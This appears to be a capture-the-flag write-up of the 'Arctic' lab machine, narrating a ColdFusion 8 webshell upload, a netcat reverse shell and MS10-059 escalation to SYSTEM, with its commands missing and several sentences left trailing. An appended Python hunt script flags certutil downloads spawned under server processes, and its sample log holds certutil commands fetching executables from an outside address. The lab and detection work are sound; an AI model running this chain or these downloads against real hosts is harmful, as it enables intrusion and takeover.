Arctic
Discovered only three open ports: RPC on 135, another MSRPC on 49154, and port 8500 running Adobe ColdFusion 8.
Identified ColdFusion 8 as vulnerable to RCE using .
Gained a reverse shell via ColdFusion’s vulnerable REST endpoint.
Used windows-exploit-suggester to identify privilege escalation paths.
Chose MS10-059 for kernel-level privilege escalation.
Uploaded the exploit via certutil and popped a SYSTEM shell.
Nmap Output:
Visiting http://10.10.10.11:8500 showed the Adobe ColdFusion 8 interface.
ColdFusion 8 has known unauthenticated RCE exploits, particularly via FCKeditor or misconfigured endpoints.
The exploit works by uploading a .jsp webshell via the vulnerable file upload endpoint exposed in ColdFusion 8.
Steps:
Modified exploit to upload reverse shell.
Started a local HTTP server to host payload:
Payload logic:
Upload nc.exe to the victim using certutil
Execute it using the uploaded .jsp web shell
Example access:
Reverse shell landed on port 7777. Initial shell was low-privilege.
Used windows-exploit-suggester to identify escalation paths:
Target identified as Windows 2008 R2 64-bit with no installed patches.
Chose exploit: MS10-059 – Vulnerability in the Tracing Feature for Services.
Uploaded the executable using certutil:
Ran the exploit with a listener on port 9999:
On attacker machine:
SYSTEM reverse shell established 🎯
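Both file transfers above have certutil fetch an executable over HTTP from a shell that runs under the ColdFusion service, and that shows up clearly in process-creation logs. The following hunt for it is an added example, not part of the original writeup: the log format, field names, hosts and addresses are constructed, and the list of server process names is an assumption.

```python
import json
import ntpath
import re

# certutil verbs that can fetch remote content, plus a URL argument to go with them.
DOWNLOAD_VERB = re.compile(r"(?<!\S)[-/](urlcache|verifyctl)\b", re.I)
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://\S+", re.I)
# Assumption: web/application server images in this estate (jrun.exe = ColdFusion 8 on JRun).
SERVER_IMAGES = {"jrun.exe", "w3wp.exe", "httpd.exe", "tomcat.exe"}

# Constructed sample events, one JSON object per line; field names are hypothetical.
SAMPLE_LOG = r'''
{"host":"WEB01","pid":1200,"ppid":500,"image":"C:\\ColdFusion8\\runtime\\bin\\jrun.exe","cmd":"jrun.exe"}
{"host":"WEB01","pid":2304,"ppid":1200,"image":"C:\\Windows\\System32\\cmd.exe","cmd":"cmd.exe /c certutil -urlcache -f http://192.0.2.50/tool.exe tool.exe"}
{"host":"WEB01","pid":2310,"ppid":2304,"image":"C:\\Windows\\System32\\certutil.exe","cmd":"certutil -urlcache -f http://192.0.2.50/tool.exe tool.exe"}
{"host":"PKI01","pid":880,"ppid":700,"image":"C:\\Windows\\System32\\certutil.exe","cmd":"certutil -verify C:\\certs\\leaf.cer"}
{"host":"WS07","pid":4100,"ppid":3900,"image":"C:\\Windows\\System32\\certutil.exe","cmd":"certutil.exe -URLCache -split -f https://192.0.2.80/a.txt"}
{"host":"WS07","pid":3900,"ppid":400,"image":"C:\\Windows\\explorer.exe","cmd":"explorer.exe"}
'''

def basename(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()

def hunt(log_text):
    """Return (host, severity, url) for each certutil invocation that fetches a remote file."""
    events = [json.loads(line) for line in log_text.splitlines() if line.strip()]
    by_pid = {(e["host"], e["pid"]): e for e in events}
    hits = []
    for e in events:
        url = REMOTE_URL.search(e["cmd"])
        if basename(e["image"]) != "certutil.exe" or not url or not DOWNLOAD_VERB.search(e["cmd"]):
            continue  # ordinary certificate work (e.g. -verify) is not flagged
        # Walk up the parent chain; a server process anywhere above certutil raises severity.
        severity, parent, seen = "medium", by_pid.get((e["host"], e["ppid"])), set()
        while parent and parent["pid"] not in seen:
            seen.add(parent["pid"])
            if basename(parent["image"]) in SERVER_IMAGES:
                severity = "high"
                break
            parent = by_pid.get((e["host"], parent["ppid"]))
        hits.append((e["host"], severity, url.group(0)))
    return hits

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit)
```

Walking the whole ancestry matters because certutil's direct parent here is cmd.exe; the server process sits one level above it.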
Used — Adobe ColdFusion 8 RCE exploit.
Downloaded compiled exploit from: